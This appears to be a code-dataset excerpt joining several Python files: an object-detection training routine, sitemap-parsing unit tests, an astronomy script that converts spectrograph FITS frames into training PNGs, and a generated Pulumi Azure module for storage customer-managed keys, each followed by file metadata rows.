    if 'imgs_per_gpu' in cfg.data:
        # Backwards compatibility: MMDet V2.0 renamed 'imgs_per_gpu' to
        # 'samples_per_gpu'; the legacy key wins when both are present.
        logger.warning('"imgs_per_gpu" is deprecated in MMDet V2.0. '
                       'Please use "samples_per_gpu" instead')
        if 'samples_per_gpu' in cfg.data:
            logger.warning(
                f'Got "imgs_per_gpu"={cfg.data.imgs_per_gpu} and '
                f'"samples_per_gpu"={cfg.data.samples_per_gpu}, "imgs_per_gpu"'
                f'={cfg.data.imgs_per_gpu} is used in this experiments')
        else:
            logger.warning(
                'Automatically set "samples_per_gpu"="imgs_per_gpu"='
                f'{cfg.data.imgs_per_gpu} in this experiments')
        cfg.data.samples_per_gpu = cfg.data.imgs_per_gpu
    data_loaders = [
        build_dataloader(
            ds,
            cfg.data.samples_per_gpu,
            cfg.data.workers_per_gpu,
            # cfg.gpus will be ignored if distributed
            len(cfg.gpu_ids),
            dist=distributed,
            # InstanceLoc-specific sampler option; defaults to off.
            nonoverlap_sampler=cfg.get('nonoverlap_sampler', False),
            seed=cfg.seed) for ds in dataset
    ]
    # put model on gpus
    if distributed:
        find_unused_parameters = cfg.get('find_unused_parameters', True)
        # Sets the `find_unused_parameters` parameter in
        # torch.nn.parallel.DistributedDataParallel
        model = MMDistributedDataParallel(
            model.cuda(),
            device_ids=[torch.cuda.current_device()],
            broadcast_buffers=False,
            find_unused_parameters=find_unused_parameters)
    else:
        model = MMDataParallel(
            model.cuda(cfg.gpu_ids[0]), device_ids=cfg.gpu_ids)
    # build runner
    optimizer = build_optimizer(model, cfg.optimizer)
    runner = EpochBasedRunner(
        model,
        optimizer=optimizer,
        work_dir=cfg.work_dir,
        logger=logger,
        meta=meta)
    # an ugly workaround to make .log and .log.json filenames the same
    runner.timestamp = timestamp
    # In distributed runs without an explicit hook type, fall back to the
    # plain OptimizerHook built from the config dict.
    if distributed and 'type' not in cfg.optimizer_config:
        optimizer_config = OptimizerHook(**cfg.optimizer_config)
    else:
        optimizer_config = cfg.optimizer_config
    # register hooks
    runner.register_training_hooks(cfg.lr_config, optimizer_config,
                                   cfg.checkpoint_config, cfg.log_config,
                                   cfg.get('momentum_config', None))
    if distributed:
        # Reseeds each worker's sampler per epoch in distributed training.
        runner.register_hook(DistSamplerSeedHook())
    # Resuming takes precedence over loading initial weights.
    if cfg.resume_from:
        runner.resume(cfg.resume_from)
    elif cfg.load_from:
        runner.load_checkpoint(cfg.load_from)
    runner.run(data_loaders, cfg.workflow, cfg.total_epochs)
| 35.517857 | 79 | 0.633987 |
ace081456ba8a7a73a8bd148538b96ee450727c0 | 1,836 | py | Python | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | sitemapsearcher_test.py | courupteddata/SitemapSearcher | 585db780afd83cdb06f8ae88faece4c2c9aba1cb | [
"MIT"
] | null | null | null | import unittest
import sitemapsearcher
class ParsingRobotsTXT(unittest.TestCase):
    """Live-network checks of ``SitemapSearcher._parse_robots_txt``.

    Every scheme/host variant of google.com must resolve to the same
    canonical sitemap URL; yahoo.com advertises several (gzipped) sitemaps.
    """

    GOOGLE_SITEMAPS = {"https://www.google.com/sitemap.xml"}

    def _parse(self, url):
        # Run robots.txt discovery through a fresh searcher instance.
        return sitemapsearcher.SitemapSearcher()._parse_robots_txt(url)

    def test_base_functionality_with_https_and_www(self):
        self.assertEqual(self._parse("https://www.google.com"), self.GOOGLE_SITEMAPS)

    def test_base_functionality_with_https(self):
        self.assertEqual(self._parse("https://google.com"), self.GOOGLE_SITEMAPS)

    def test_base_functionality_with_http_and_www(self):
        self.assertEqual(self._parse("http://www.google.com"), self.GOOGLE_SITEMAPS)

    def test_base_functionality_with_http(self):
        self.assertEqual(self._parse("http://google.com"), self.GOOGLE_SITEMAPS)

    def test_base_functionality_gzipped(self):
        self.assertGreaterEqual(len(self._parse("https://www.yahoo.com")), 5)
class LoadSitemapData(unittest.TestCase):
    """Live-network checks of ``SitemapSearcher._load_sitemap_data``."""

    def _fetch(self, url):
        # Download (and transparently decompress) sitemap bytes through a
        # fresh searcher instance.
        return sitemapsearcher.SitemapSearcher()._load_sitemap_data(url)

    def test_normal_sitemap(self):
        payload = self._fetch("https://www.google.com/sitemap.xml")
        self.assertGreaterEqual(len(payload), 1000)
        self.assertTrue(b"<sitemapindex" in payload)

    def test_gzipped_data(self):
        payload = self._fetch("https://www.yahoo.com/news/sitemaps/news-sitemap_index_US_en-US.xml.gz")
        self.assertGreaterEqual(len(payload), 1000)
        self.assertTrue(b"<sitemapindex" in payload)
# Allow running this test module directly (python sitemapsearcher_test.py).
if __name__ == '__main__':
    unittest.main()
| 43.714286 | 118 | 0.730937 |
ace08291b176b9391cb7c641f7c96ab15c8d8c6f | 6,133 | py | Python | spit/instruments/kast.py | PYPIT/spit | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 2 | 2018-09-25T17:06:31.000Z | 2019-07-02T18:28:55.000Z | spit/instruments/kast.py | pypeit/spit | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 6 | 2019-07-04T13:43:55.000Z | 2019-07-26T21:31:34.000Z | spit/instruments/kast.py | PYPIT/auto_type | 77f0687c9aeae11ad56f0c5ac2a2b2ad21eed7fb | [
"BSD-3-Clause"
] | 2 | 2018-09-25T17:06:35.000Z | 2019-07-02T18:10:11.000Z | """
Generate files and perform training related to Kast
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import numpy as np
import glob
import os
import pdb
from spit import generate_pngs as spit_png
from spit import preprocess
spit_path = os.getenv('SPIT_DATA')
def generate_pngs(category, clobber=False, seed=12345, debug=False, regular=True):
    """Render the PNG training images for one Kast data split.

    Flat frames are converted first; each other frame type (arc, bias,
    standard, science) is then re-sampled -- with a seeded RNG so reruns
    select the same frames -- until it has been rendered as many times as
    there are flats, regularizing the class balance.

    Parameters
    ----------
    category : str
        Data split under ``$SPIT_DATA/Kast``: 'train', 'test' or 'validation'.
    clobber : bool, optional
        Overwrite PNGs that already exist.
    seed : int, optional
        Seed for the frame-selection RNG (fixed so reruns are reproducible).
    debug : bool, optional
        Unused; retained for backwards compatibility.
    regular : bool, optional
        If True, assert afterwards that every type directory holds 4x the
        number of flats (presumably 4 PNG orientations per FITS frame --
        TODO confirm against spit.generate_pngs.make_standard).

    Returns
    -------
    None
    """
    bidx = [0,-8]  # Column indices trimmed from each frame before rendering
    # Pre-processing dict
    pdict = preprocess.original_preproc_dict()
    #
    rstate = np.random.RandomState(seed)
    outroot = spit_path+'/Kast/PNG/{:s}/'.format(category)
    # Flats first (they are the most common)
    flat_files = glob.glob(spit_path+'/Kast/FITS/{:s}/flat/*fits.gz'.format(category))
    nflats = len(flat_files)
    # Output dir
    outdir = outroot+'flat/'
    if not os.path.isdir(outdir):
        os.mkdir(outdir)
    # Loop me
    for flat_file in flat_files:
        spit_png.make_standard(flat_file, outdir, bidx, 0, pdict, clobber=clobber)
    # Other image types (regularizing to the number of flats)
    for itype in ['arc','bias','standard','science']:
        files = glob.glob(spit_path+'/Kast/FITS/{:s}/{:s}/*fits.gz'.format(category, itype))
        nfiles = len(files)
        # Output dir
        outdir = outroot+'{:s}/'.format(itype)
        if not os.path.isdir(outdir):
            os.mkdir(outdir)
        # Start looping
        ntot = 0 # Number of FITS files used
        step = 0 # Index looping through the image for normalization
        # Loop me
        while ntot < nflats:
            npull = min(nflats-ntot, nfiles)
            # Randomize, but use seeded to avoid new ones appearing!
            rand = rstate.rand(npull)
            srt = np.argsort(rand)
            # NOTE(review): srt only contains indices 0..npull-1, so when
            # npull < nfiles only the first npull files are ever selected
            # (in shuffled order) -- confirm this is intended.
            #if len(np.unique(srt)) != npull:
            #    pdb.set_trace()
            #if npull < nfiles:
            #    pdb.set_trace()
            # Loop
            #save_files = []
            for kk in srt:
                filen = files[kk]
                #if step == 5:
                #    print(kk, filen)
                #save_files.append(filen)
                spit_png.make_standard(filen, outdir, bidx, step, pdict, clobber=clobber)
            # Check (Debugging)
            #for ifile in save_files:
            #    if 'may19_2015_r1' in ifile:
            #        print(ifile)
            #if step == 5:
            #    pdb.set_trace()
            # Increment
            step += 1
            ntot += npull
    # Sanity check
    if regular:
        for itype in ['flat', 'arc','bias','standard','science']:
            outroot = spit_path+'/Kast/PNG/{:s}/{:s}'.format(category, itype)
            files = glob.glob(outroot+'/*.png')
            try:
                assert len(files) == 4*nflats
            except AssertionError:
                # Drop into the debugger for inspection instead of raising.
                pdb.set_trace()
def copy_over_fits(clobber=False):
    """Copy raw Kast FITS frames into the SPIT directory tree.

    Walks the ``0_*.fits.gz`` entries under ``$SPIT_DATA/Kast/FITS/old`` for
    every data split and frame type, parses the originating folder/frame
    names out of each basename, and copies the matching raw file into the
    new layout. Only 'xavier' files (from the local Lick archive) are
    currently copied; the other branch is disabled (see NOTE below).

    Parameters
    ----------
    clobber : bool, optional
        If True, overwrite destination files that already exist.
    """
    import subprocess
    vik_path = spit_path+'/Kast/FITS/Viktor/' # Downloaded from Google Drive
    x_path = '/data/Lick/Kast/data/' # Downloaded from Google Drive
    oldroot = spit_path+'/Kast/FITS/old/'
    newroot = spit_path+'/Kast/FITS/'
    # Skip files (bad ones somehow crept in)
    bad_files = ['oct6_2016_r34'] # There are another ~9 files
    for iset in ['test', 'train', 'validation']:
        for itype in ['flat', 'arc','bias','standard','science']:
            newdir = newroot+'/{:s}/{:s}/'.format(iset, itype)
            #
            files = glob.glob(oldroot+'/{:s}/{:s}/0_*.fits.gz'.format(iset,itype))
            files.sort()
            for ifile in files:
                # Parse me
                basename = os.path.basename(ifile)
                if 'xavier' in basename:
                    # Basename looks like 0_..._raw_<fldr>_Raw_<fnm>.fits...
                    i0 = basename.find('raw_')+4
                    i1 = basename.find('_Raw')
                    i2 = basename.find('.fits')
                    # Folder
                    fldr = basename[i0:i1]
                    fnm = basename[i1+5:i2]
                    # Files
                    xfile = x_path+'/{:s}/Raw/{:s}.fits.gz'.format(fldr, fnm)
                    newfile = newdir+'{:s}_{:s}.fits.gz'.format(fldr, fnm)
                    skip = False
                    if (not os.path.isfile(newfile)) or clobber:
                        if not skip:
                            subprocess.call(['cp', '-rp', xfile, newfile])
                else: # Tiffany's files
                    # NOTE(review): this 'continue' disables everything
                    # below it; the Viktor-file copying is currently dead
                    # code -- confirm whether that is intentional.
                    continue
                    i0 = 2
                    i1 = max(basename.find('_r'), basename.find('_b'))
                    i2 = basename.find('.fits')
                    # Folder
                    fldr = basename[i0:i1]
                    fnm = basename[i1+1:i2]
                    # Files
                    vikfile = vik_path+'/{:s}/{:s}.fits.gz'.format(fldr, fnm)
                    newfile = newdir+'{:s}_{:s}.fits.gz'.format(fldr, fnm)
                    skip = False
                    if not os.path.isfile(vikfile):
                        # Bug fix: 'in [bad_files]' compared against a
                        # list-of-list and could never match; test
                        # membership in bad_files itself.
                        if fldr+'_'+fnm in bad_files:
                            print("Skipping: {:s}_{:s}".format(fldr, fnm))
                            skip = True
                        else:
                            pdb.set_trace()
                    # Copy
                    if (not os.path.isfile(newfile)) or clobber:
                        if not skip:
                            subprocess.call(['cp', '-rp', vikfile, newfile])
def main(flg):
    """Dispatch the processing steps selected by the bit flags in *flg*.

    Bit 0 regenerates the PNG previews for every data split (all splits are
    regularized, matching generate_pngs' default); bit 1 copies the raw
    FITS files into the SPIT directory tree.
    """
    if flg & 0b01:
        for split in ('train', 'test', 'validation'):
            generate_pngs(split, regular=True)
    if flg & 0b10:
        copy_over_fits()
# Generate PNGs
# Command line execution
if __name__ == '__main__':
    import sys
    if len(sys.argv) == 1:
        # Default behaviour: only regenerate the PNGs.
        flg = 0
        flg += 2**0 # PNGs
        #flg += 2**1 # copy over FITS
    else:
        # Bug fix: main() combines the flag with bitwise '&', which raises
        # TypeError on the raw command-line string -- convert to int first.
        flg = int(sys.argv[1])
    main(flg)
| 34.072222 | 92 | 0.503832 |
ace0836753619bd410b1bfe91ba5682cc7a0cda0 | 21,712 | py | Python | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/storage/customer_managed_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CustomerManagedKeyArgs', 'CustomerManagedKey']
@pulumi.input_type
class CustomerManagedKeyArgs:
    """Input properties for constructing a ``CustomerManagedKey`` resource.

    NOTE: machine-generated by the Pulumi Terraform bridge (tfgen);
    regenerate rather than editing by hand.
    """
    def __init__(__self__, *,
                 key_name: pulumi.Input[str],
                 key_vault_id: pulumi.Input[str],
                 storage_account_id: pulumi.Input[str],
                 key_version: Optional[pulumi.Input[str]] = None,
                 user_assigned_identity_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a CustomerManagedKey resource.
        :param pulumi.Input[str] key_name: The name of Key Vault Key.
        :param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        :param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
        """
        pulumi.set(__self__, "key_name", key_name)
        pulumi.set(__self__, "key_vault_id", key_vault_id)
        pulumi.set(__self__, "storage_account_id", storage_account_id)
        # Optional inputs are only recorded when the caller supplied them.
        if key_version is not None:
            pulumi.set(__self__, "key_version", key_version)
        if user_assigned_identity_id is not None:
            pulumi.set(__self__, "user_assigned_identity_id", user_assigned_identity_id)

    @property
    @pulumi.getter(name="keyName")
    def key_name(self) -> pulumi.Input[str]:
        """
        The name of Key Vault Key.
        """
        return pulumi.get(self, "key_name")

    @key_name.setter
    def key_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "key_name", value)

    @property
    @pulumi.getter(name="keyVaultId")
    def key_vault_id(self) -> pulumi.Input[str]:
        """
        The ID of the Key Vault. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "key_vault_id")

    @key_vault_id.setter
    def key_vault_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "key_vault_id", value)

    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> pulumi.Input[str]:
        """
        The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")

    @storage_account_id.setter
    def storage_account_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_id", value)

    @property
    @pulumi.getter(name="keyVersion")
    def key_version(self) -> Optional[pulumi.Input[str]]:
        """
        The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        """
        return pulumi.get(self, "key_version")

    @key_version.setter
    def key_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_version", value)

    @property
    @pulumi.getter(name="userAssignedIdentityId")
    def user_assigned_identity_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of a user assigned identity.
        """
        return pulumi.get(self, "user_assigned_identity_id")

    @user_assigned_identity_id.setter
    def user_assigned_identity_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_assigned_identity_id", value)
@pulumi.input_type
class _CustomerManagedKeyState:
    """State properties used for looking up and filtering
    ``CustomerManagedKey`` resources; every field is optional.

    NOTE: machine-generated by the Pulumi Terraform bridge (tfgen);
    regenerate rather than editing by hand.
    """
    def __init__(__self__, *,
                 key_name: Optional[pulumi.Input[str]] = None,
                 key_vault_id: Optional[pulumi.Input[str]] = None,
                 key_version: Optional[pulumi.Input[str]] = None,
                 storage_account_id: Optional[pulumi.Input[str]] = None,
                 user_assigned_identity_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering CustomerManagedKey resources.
        :param pulumi.Input[str] key_name: The name of Key Vault Key.
        :param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
        :param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
        """
        # Only record the state fields the caller actually supplied.
        if key_name is not None:
            pulumi.set(__self__, "key_name", key_name)
        if key_vault_id is not None:
            pulumi.set(__self__, "key_vault_id", key_vault_id)
        if key_version is not None:
            pulumi.set(__self__, "key_version", key_version)
        if storage_account_id is not None:
            pulumi.set(__self__, "storage_account_id", storage_account_id)
        if user_assigned_identity_id is not None:
            pulumi.set(__self__, "user_assigned_identity_id", user_assigned_identity_id)

    @property
    @pulumi.getter(name="keyName")
    def key_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of Key Vault Key.
        """
        return pulumi.get(self, "key_name")

    @key_name.setter
    def key_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_name", value)

    @property
    @pulumi.getter(name="keyVaultId")
    def key_vault_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Key Vault. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "key_vault_id")

    @key_vault_id.setter
    def key_vault_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_vault_id", value)

    @property
    @pulumi.getter(name="keyVersion")
    def key_version(self) -> Optional[pulumi.Input[str]]:
        """
        The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        """
        return pulumi.get(self, "key_version")

    @key_version.setter
    def key_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_version", value)

    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")

    @storage_account_id.setter
    def storage_account_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "storage_account_id", value)

    @property
    @pulumi.getter(name="userAssignedIdentityId")
    def user_assigned_identity_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of a user assigned identity.
        """
        return pulumi.get(self, "user_assigned_identity_id")

    @user_assigned_identity_id.setter
    def user_assigned_identity_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_assigned_identity_id", value)
class CustomerManagedKey(pulumi.CustomResource):
    """Manages a Customer Managed Key for an Azure Storage Account.

    NOTE: machine-generated by the Pulumi Terraform bridge (tfgen);
    regenerate rather than editing by hand.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 key_name: Optional[pulumi.Input[str]] = None,
                 key_vault_id: Optional[pulumi.Input[str]] = None,
                 key_version: Optional[pulumi.Input[str]] = None,
                 storage_account_id: Optional[pulumi.Input[str]] = None,
                 user_assigned_identity_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Customer Managed Key for a Storage Account.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        current = azure.core.get_client_config()
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            tenant_id=current.tenant_id,
            sku_name="standard",
            purge_protection_enabled=True)
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS",
            identity=azure.storage.AccountIdentityArgs(
                type="SystemAssigned",
            ))
        storage = azure.keyvault.AccessPolicy("storage",
            key_vault_id=example_key_vault.id,
            tenant_id=current.tenant_id,
            object_id=example_account.identity.principal_id,
            key_permissions=[
                "get",
                "create",
                "list",
                "restore",
                "recover",
                "unwrapkey",
                "wrapkey",
                "purge",
                "encrypt",
                "decrypt",
                "sign",
                "verify",
            ],
            secret_permissions=["get"])
        client = azure.keyvault.AccessPolicy("client",
            key_vault_id=example_key_vault.id,
            tenant_id=current.tenant_id,
            object_id=current.object_id,
            key_permissions=[
                "get",
                "create",
                "delete",
                "list",
                "restore",
                "recover",
                "unwrapkey",
                "wrapkey",
                "purge",
                "encrypt",
                "decrypt",
                "sign",
                "verify",
            ],
            secret_permissions=["get"])
        example_key = azure.keyvault.Key("exampleKey",
            key_vault_id=example_key_vault.id,
            key_type="RSA",
            key_size=2048,
            key_opts=[
                "decrypt",
                "encrypt",
                "sign",
                "unwrapKey",
                "verify",
                "wrapKey",
            ],
            opts=pulumi.ResourceOptions(depends_on=[
                    client,
                    storage,
                ]))
        example_customer_managed_key = azure.storage.CustomerManagedKey("exampleCustomerManagedKey",
            storage_account_id=example_account.id,
            key_vault_id=example_key_vault.id,
            key_name=example_key.name)
        ```

        ## Import

        Customer Managed Keys for a Storage Account can be imported using the `resource id` of the Storage Account, e.g.

        ```sh
         $ pulumi import azure:storage/customerManagedKey:CustomerManagedKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Storage/storageAccounts/myaccount
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] key_name: The name of Key Vault Key.
        :param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
        :param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: CustomerManagedKeyArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Customer Managed Key for a Storage Account.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        current = azure.core.get_client_config()
        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            tenant_id=current.tenant_id,
            sku_name="standard",
            purge_protection_enabled=True)
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS",
            identity=azure.storage.AccountIdentityArgs(
                type="SystemAssigned",
            ))
        storage = azure.keyvault.AccessPolicy("storage",
            key_vault_id=example_key_vault.id,
            tenant_id=current.tenant_id,
            object_id=example_account.identity.principal_id,
            key_permissions=[
                "get",
                "create",
                "list",
                "restore",
                "recover",
                "unwrapkey",
                "wrapkey",
                "purge",
                "encrypt",
                "decrypt",
                "sign",
                "verify",
            ],
            secret_permissions=["get"])
        client = azure.keyvault.AccessPolicy("client",
            key_vault_id=example_key_vault.id,
            tenant_id=current.tenant_id,
            object_id=current.object_id,
            key_permissions=[
                "get",
                "create",
                "delete",
                "list",
                "restore",
                "recover",
                "unwrapkey",
                "wrapkey",
                "purge",
                "encrypt",
                "decrypt",
                "sign",
                "verify",
            ],
            secret_permissions=["get"])
        example_key = azure.keyvault.Key("exampleKey",
            key_vault_id=example_key_vault.id,
            key_type="RSA",
            key_size=2048,
            key_opts=[
                "decrypt",
                "encrypt",
                "sign",
                "unwrapKey",
                "verify",
                "wrapKey",
            ],
            opts=pulumi.ResourceOptions(depends_on=[
                    client,
                    storage,
                ]))
        example_customer_managed_key = azure.storage.CustomerManagedKey("exampleCustomerManagedKey",
            storage_account_id=example_account.id,
            key_vault_id=example_key_vault.id,
            key_name=example_key.name)
        ```

        ## Import

        Customer Managed Keys for a Storage Account can be imported using the `resource id` of the Storage Account, e.g.

        ```sh
         $ pulumi import azure:storage/customerManagedKey:CustomerManagedKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Storage/storageAccounts/myaccount
        ```

        :param str resource_name: The name of the resource.
        :param CustomerManagedKeyArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # CustomerManagedKeyArgs object or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(CustomerManagedKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       key_name: Optional[pulumi.Input[str]] = None,
                       key_vault_id: Optional[pulumi.Input[str]] = None,
                       key_version: Optional[pulumi.Input[str]] = None,
                       storage_account_id: Optional[pulumi.Input[str]] = None,
                       user_assigned_identity_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared constructor body: validate options, enforce required
        # properties, then register the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = CustomerManagedKeyArgs.__new__(CustomerManagedKeyArgs)

            if key_name is None and not opts.urn:
                raise TypeError("Missing required property 'key_name'")
            __props__.__dict__["key_name"] = key_name
            if key_vault_id is None and not opts.urn:
                raise TypeError("Missing required property 'key_vault_id'")
            __props__.__dict__["key_vault_id"] = key_vault_id
            __props__.__dict__["key_version"] = key_version
            if storage_account_id is None and not opts.urn:
                raise TypeError("Missing required property 'storage_account_id'")
            __props__.__dict__["storage_account_id"] = storage_account_id
            __props__.__dict__["user_assigned_identity_id"] = user_assigned_identity_id
        super(CustomerManagedKey, __self__).__init__(
            'azure:storage/customerManagedKey:CustomerManagedKey',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            key_name: Optional[pulumi.Input[str]] = None,
            key_vault_id: Optional[pulumi.Input[str]] = None,
            key_version: Optional[pulumi.Input[str]] = None,
            storage_account_id: Optional[pulumi.Input[str]] = None,
            user_assigned_identity_id: Optional[pulumi.Input[str]] = None) -> 'CustomerManagedKey':
        """
        Get an existing CustomerManagedKey resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] key_name: The name of Key Vault Key.
        :param pulumi.Input[str] key_vault_id: The ID of the Key Vault. Changing this forces a new resource to be created.
        :param pulumi.Input[str] key_version: The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] user_assigned_identity_id: The ID of a user assigned identity.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _CustomerManagedKeyState.__new__(_CustomerManagedKeyState)

        __props__.__dict__["key_name"] = key_name
        __props__.__dict__["key_vault_id"] = key_vault_id
        __props__.__dict__["key_version"] = key_version
        __props__.__dict__["storage_account_id"] = storage_account_id
        __props__.__dict__["user_assigned_identity_id"] = user_assigned_identity_id
        return CustomerManagedKey(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="keyName")
    def key_name(self) -> pulumi.Output[str]:
        """
        The name of Key Vault Key.
        """
        return pulumi.get(self, "key_name")

    @property
    @pulumi.getter(name="keyVaultId")
    def key_vault_id(self) -> pulumi.Output[str]:
        """
        The ID of the Key Vault. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "key_vault_id")

    @property
    @pulumi.getter(name="keyVersion")
    def key_version(self) -> pulumi.Output[Optional[str]]:
        """
        The version of Key Vault Key. Remove or omit this argument to enable Automatic Key Rotation.
        """
        return pulumi.get(self, "key_version")

    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> pulumi.Output[str]:
        """
        The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")

    @property
    @pulumi.getter(name="userAssignedIdentityId")
    def user_assigned_identity_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of a user assigned identity.
        """
        return pulumi.get(self, "user_assigned_identity_id")
ace08406f968ca57010d146daa3e61b2c75f2276 | 10,627 | py | Python | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
